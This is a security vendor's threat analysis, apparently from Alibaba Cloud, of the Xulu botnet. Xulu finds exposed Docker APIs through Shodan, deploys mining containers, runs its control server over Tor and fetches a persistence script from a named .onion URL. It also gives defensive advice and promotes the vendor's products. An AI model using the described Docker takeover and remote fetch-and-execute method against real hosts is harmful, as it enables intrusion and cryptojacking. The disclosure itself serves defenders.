Xulu: Cryptojacking Leveraging Shodan, Tor, and Malicious Docker Container

Earlier this month, we detected a mining botnet that deploys malicious Docker containers on victim hosts by exploiting Docker’s remote API unauthorized Access vulnerability. We have named the botnet “Xulu” because it serves as username in the botnet’s mining.

Xulu is not the first botnet case that aims at Docker; yet it differs from other botnets by not scanning other hosts by itself, instead it utilizes OSINT (open-source intelligence) technique and dynamically searches Shodan for lists of possible preys.

It also placed its controlling server in the Tor network, which is probably an effort to hide the evil backstage manipulator of the botnet.

Image for post
Image for post

Malicious Docker Images that Mine Monero

A container is a standard unit of software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another.

This definition from docker.com explains what a docker container is. Nowadays, as microservices continue to gain popularity, more enterprises use containers to deploy applications. Yet their security is often overlooked, and Docker services can become an easy target for exploitation.

When digging into the Xulu botnet event, we noticed that containers with malicious “zoolu2/auto” docker images are created on compromised hosts.

Image for post
Image for post

The containers have following processes running:

Image for post
Image for post

It is easy to distinguish the mining process

Since miningpoolhub .com does not provide public payment data of its users, we do not know how much economic profit the threat actor has earned from cryptojacking.

Botnet Propagation and Persistence

The Xulu botnet propagates itself with OSINT techniques and the Tor network.

To begin with, the botnet uses http://wg6kw72fqds5n2q2x6qjejenrskg6i3dywe7xrcselhbeiikoxfrmnqd.onion as control server. The ".onion" suffix indicates that it is an anonymous onion service (a.k.a "hidden service") reachable via the Tor network.

Image for post
Image for post

The botnet also runs /toolbin/shodaemon as the main daemon process:

Image for post
Image for post

From the script we can see it firstly generates /search.txt by combining content of remote file http://wg6kw72fqds5n2q2x6qjejenrskg6i3dywe7xrcselhbeiikoxfrmnqd.onion/shodan.txt and local file /toolbin/hcode.txt .

Image for post
Image for post
Image for post
Image for post

Each file contains a list of shodan queries, which are then read and sent by /toolbin/shodan:

The queries return host ips with Docker port (2375) open on the Internet. Though not all of them are vulnerable, the threat actor can save a lot of mass scanning work by using information from Shodan.

Image for post
Image for post

After removing duplication, the compromised host would then send “docker run” command to each collected ip. The zoolu2/auto malicious container will then be deployed on new hosts with Docker remote API unauthorized Access vulnerability.

Image for post
Image for post

Besides, the botnet downloads and executes script from http://wg6kw72fqds5n2q2x6qjejenrskg6i3dywe7xrcselhbeiikoxfrmnqd.onion/bnet1.txtfor persistence.

Image for post
Image for post

Scale of Attack and Security Recommendations

On https://hub.docker.com , the aforementioned malicious docker image has been downloaded more than 10k times.

Image for post
Image for post

The author of Xulu botnet seems to be actively developing variants of the botnet:

Image for post
Image for post

This event is also observed by a Docker user, Caprico1, and discussed on Docker’s GitHub.

Image for post
Image for post

https://github.com/docker/hub-feedback/issues/1809

By the time this article is published, the zoolu2 account has been disabled by Docker’s engineers.

Image for post
Image for post

To avoid becoming a victim of malicious intrusion and mining, we have following recommendations for you:

  • Services for internal use (e.g. Docker) should not be exposed to the Internet. Use adequate ACL or other authentication technique to only allow access from trusted users.
  • Since hidden services have been used by many botnets, users who do not often use them may use some tricks to drop packets to and from it, such as on Linux you can run: echo -e "\n0.0.0.0 .onion" >> /etc/hosts This command sinkholes (redirects) any traffic to and from hidden services.
  • Cloud firewalls are useful in preventing attacks. We recommend Alibaba Cloud Firewall because it is able to detect, block and analyze threats. You will be protected from intrusion and malicious mining with AI technologies on your side.
  • Alibaba Cloud Managed Security Service enables users to call on expertise of Alibaba’s security specialists, who will help you clean up malware, improve configurations, and enhance overall security. If you are concerned about your organizations’ security, you should give it a try.

IOC

Control Server:

URL:

Pool:

Md5:

Reference

https://twitter.com/Suprn8/status/1129877707897081856

https://www.alibabacloud.com/blog/dockerkiller-threat-analysis-first-instance-of-batch-attack-and-exploitation-of-docker-services_593947

Reference:https://www.alibabacloud.com/blog/xulu-cryptojacking-leveraging-shodan-tor-and-malicious-docker-container_594869?spm=a2c41.12952014.0.0

Written by

Follow me to keep abreast with the latest technology news, industry insights, and developer trends.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store